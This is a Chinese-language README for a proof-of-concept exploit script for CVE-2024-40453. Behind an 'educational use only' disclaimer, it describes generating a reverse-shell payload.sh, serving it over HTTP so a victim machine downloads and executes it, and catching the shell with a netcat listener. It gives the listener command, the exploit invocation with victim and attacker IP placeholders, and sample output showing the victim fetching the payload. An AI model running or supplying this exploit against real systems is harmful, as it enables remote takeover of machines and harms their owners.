本脚本仅供教育用途。
请勿将其用于非法目的。
如果用于非法目的,责任完全由使用者承担;本人不对任何滥用行为负责。
该脚本会在当前目录下创建一个名为 payload.sh 的反向 Shell。
然后它在 80 端口上托管一个 HTTP 服务器,供受害者拉取 payload.sh。
攻击者机器上需要启动一个监听器。
HTTP 服务器会在 3 秒后关闭,以便受害者拉取并执行 payload.sh。
基于以下信息,开发了此概念验证(POC)。 https://samuzora.com/posts/cve-2024-40453
启动监听器
rlwrap nc -nvlp 3000
执行载荷
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>
python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!